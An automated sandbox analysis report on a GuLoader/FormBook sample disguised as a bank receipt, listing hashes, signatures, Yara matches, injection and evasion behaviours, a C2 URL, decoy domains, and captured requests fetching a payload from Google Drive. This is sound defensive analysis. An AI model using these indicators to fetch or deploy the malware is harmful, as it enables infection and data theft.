Windows Analysis Report Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Overview

General Information

Sample Name: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Analysis ID: 540355
MD5: 72a345c95142aee60e7df54b570c2c6b
SHA1: aa479735d39ced67594ff0b0d5f91679e506ac38
SHA256: a7a0ada5969b3b343a5c2d17e1fe57f542a0f9cb94b98daf7a4922d8cdcd5e8d
Tags: exe, Formbook, guloader, xloader
Detection

GuLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Detected unpacking (changes PE section rights)
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Sigma detected: Suspect Svchost Activity
Yara detected GuLoader
Hides threads from debuggers
Maps a DLL or memory area into another process
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Sigma detected: Suspicious Svchost Process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
PE file contains executable resources (Code or Archives)
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.thesocialmediacreator.com/i638/"], "decoy": ["serenitynailandspanj.com", "health-dodo.com", "agjordan.net", "retro-kids.com", "bobbygoldsports.com", "seitai-kuuto369.com", "sooga.club", "ezsweswrwy68.biz", "1006e.com", "libinyu.com", "prolinkdm.com", "pilysc.com", "blim.xyz", "eshop-dekorax.com", "timestretchmusic.com", "bs6351.com", "diamondmoodle.com", "antioxida.com", "sakugastudios.com", "metaverse-coaching.com", "motometics.com", "illumination-garage.com", "thelocalsproject.com", "erealestater.com", "frankenamazing.com", "arab-enterprises.com", "e15datadev.com", "bet365star.online", "bttextiles.com", "originaltradebot.icu", "test-testjisdnsec.net", "cloudwerx.digital", "gsjbd10.club", "joshuaearp.xyz", "tvaluehelp.com", "quietplaceintheforest.com", "refinanceforblue.com", "voiceoftour.com", "civicinfluence.com", "taxation-resources.com", "regeneration.land", "gogit.net", "spicynipples.com", "goldingravel.com", "selingoo.com", "aaryantech.com", "insight-j.com", "drivenbylight.net", "meipassion.com", "scuolapadelroma.store", "929671.com", "parkerdazzle.com", "yehudi-meshutaf.com", "johnsonforsheriff2022.com", "pointhunteracademy.com", "kyliiejenner.com", "tenlog066.xyz", "dobylife.com", "josemanueldelbusto.com", "vspfrme.com", "256571.com", "crossovertest.net", "fullcurlcnc.com", "theworldisheroyster.com"]}
Multi AV Scanner detection for submitted file
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Metadefender: Detection: 14%
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe ReversingLabs: Detection: 26%
Yara detected FormBook
Source: Yara match File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY
Multi AV Scanner detection for domain / URL
Source: www.thesocialmediacreator.com/i638/ Virustotal: Detection: 5%
Machine Learning detection for sample
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.nongrav.exe.560000.1.unpack Avira: Label: TR/Dropper.Gen
Source: 22.2.svchost.exe.3f3796c.4.unpack Avira: Label: TR/Dropper.Gen
Source: 22.2.svchost.exe.3214020.1.unpack Avira: Label: TR/Dropper.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F32DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA, 0_2_00F32DAE

Compliance:

Uses 32bit PE files
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.3:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.3:49838 version: TLS 1.2
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wextract.pdb source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Binary string: wntdll.pdbUGP source: nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: nongrav.exe, nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
Source: Binary string: wextract.pdbPp source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Binary string: svchost.pdb source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp
Source: Binary string: svchost.pdbUGP source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F321E7 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00F321E7

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then pop esi 22_2_02D35825

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.thesocialmediacreator.com/i638/
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: drive.google.com
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Cache-Control: no-cache
  Host: doc-0c-ao-docs.googleusercontent.com
  Connection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ
Source: unknown DNS traffic detected: queries for: drive.google.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: nongrav.exe, 00000001.00000002.507440632.00000000006BA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.821885746.0000000003F37000.00000004.00020000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Uses 32bit PE files
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.821885746.0000000003F37000.00000004.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F31DC7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx, 0_2_00F31DC7
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: String function: 1EACB150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA9248 NtAllocateVirtualMemory, 1_2_02AA9248
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AACBBD NtProtectVirtualMemory, 1_2_02AACBBD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_00418680 NtReadFile, 15_2_00418680
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_004185D0 NtCreateFile, 15_2_004185D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_004187B0 NtAllocateVirtualMemory, 15_2_004187B0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_0041867C NtCreateFile,NtReadFile, 15_2_0041867C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_00418622 NtCreateFile, 15_2_00418622
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_004185CD NtCreateFile, 15_2_004185CD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_004187AA NtAllocateVirtualMemory, 15_2_004187AA
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB096E0 NtFreeVirtualMemory,LdrInitializeThunk, 15_2_1EB096E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09A20 NtResumeThread,LdrInitializeThunk, 15_2_1EB09A20
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09A00 NtProtectVirtualMemory,LdrInitializeThunk, 15_2_1EB09A00
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09660 NtAllocateVirtualMemory,LdrInitializeThunk, 15_2_1EB09660
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09A50 NtCreateFile,LdrInitializeThunk, 15_2_1EB09A50
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB097A0 NtUnmapViewOfSection,LdrInitializeThunk, 15_2_1EB097A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09780 NtMapViewOfSection,LdrInitializeThunk, 15_2_1EB09780
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09FE0 NtCreateMutant,LdrInitializeThunk, 15_2_1EB09FE0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09710 NtQueryInformationToken,LdrInitializeThunk, 15_2_1EB09710
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB098F0 NtReadVirtualMemory,LdrInitializeThunk, 15_2_1EB098F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09860 NtQuerySystemInformation,LdrInitializeThunk, 15_2_1EB09860
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09840 NtDelayExecution,LdrInitializeThunk, 15_2_1EB09840
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB099A0 NtCreateSection,LdrInitializeThunk, 15_2_1EB099A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09910 NtAdjustPrivilegesToken,LdrInitializeThunk, 15_2_1EB09910
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09540 NtReadFile,LdrInitializeThunk, 15_2_1EB09540
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09A80 NtOpenDirectoryObject, 15_2_1EB09A80
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB096D0 NtCreateKey, 15_2_1EB096D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09A10 NtQuerySection, 15_2_1EB09A10
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09610 NtEnumerateValueKey, 15_2_1EB09610
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09670 NtQueryInformationProcess, 15_2_1EB09670
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09650 NtQueryValueKey, 15_2_1EB09650
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB0A3B0 NtGetContextThread, 15_2_1EB0A3B0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09730 NtQueryVirtualMemory, 15_2_1EB09730
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB0A710 NtOpenProcessToken, 15_2_1EB0A710
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09B00 NtSetValueKey, 15_2_1EB09B00
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB0A770 NtOpenThread, 15_2_1EB0A770
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09770 NtSetInformationFile, 15_2_1EB09770
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09760 NtOpenProcess, 15_2_1EB09760
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB098A0 NtWriteVirtualMemory, 15_2_1EB098A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09820 NtEnumerateKey, 15_2_1EB09820
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB0B040 NtSuspendThread, 15_2_1EB0B040
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB095F0 NtQueryInformationFile, 15_2_1EB095F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB099D0 NtCreateProcessEx, 15_2_1EB099D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB095D0 NtClose, 15_2_1EB095D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB0AD30 NtSetContextThread, 15_2_1EB0AD30
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09520 NtWaitForSingleObject, 15_2_1EB09520
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09560 NtWriteFile, 15_2_1EB09560
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09950 NtQueueApcThread, 15_2_1EB09950
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_005279BE LdrInitializeThunk,NtProtectVirtualMemory, 15_2_005279BE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_00527AB1 Sleep,NtProtectVirtualMemory, 15_2_00527AB1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_005279B9 LdrInitializeThunk,NtProtectVirtualMemory, 15_2_005279B9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_00527AE7 NtProtectVirtualMemory, 15_2_00527AE7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69780 NtMapViewOfSection,LdrInitializeThunk, 22_2_03A69780
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69FE0 NtCreateMutant,LdrInitializeThunk, 22_2_03A69FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69710 NtQueryInformationToken,LdrInitializeThunk, 22_2_03A69710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A696E0 NtFreeVirtualMemory,LdrInitializeThunk, 22_2_03A696E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A696D0 NtCreateKey,LdrInitializeThunk, 22_2_03A696D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69660 NtAllocateVirtualMemory,LdrInitializeThunk, 22_2_03A69660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69650 NtQueryValueKey,LdrInitializeThunk, 22_2_03A69650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69A50 NtCreateFile,LdrInitializeThunk, 22_2_03A69A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A699A0 NtCreateSection,LdrInitializeThunk, 22_2_03A699A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A695D0 NtClose,LdrInitializeThunk, 22_2_03A695D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69910 NtAdjustPrivilegesToken,LdrInitializeThunk, 22_2_03A69910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69540 NtReadFile,LdrInitializeThunk, 22_2_03A69540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69860 NtQuerySystemInformation,LdrInitializeThunk, 22_2_03A69860
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69840 NtDelayExecution,LdrInitializeThunk, 22_2_03A69840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A697A0 NtUnmapViewOfSection, 22_2_03A697A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A6A3B0 NtGetContextThread, 22_2_03A6A3B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69730 NtQueryVirtualMemory, 22_2_03A69730
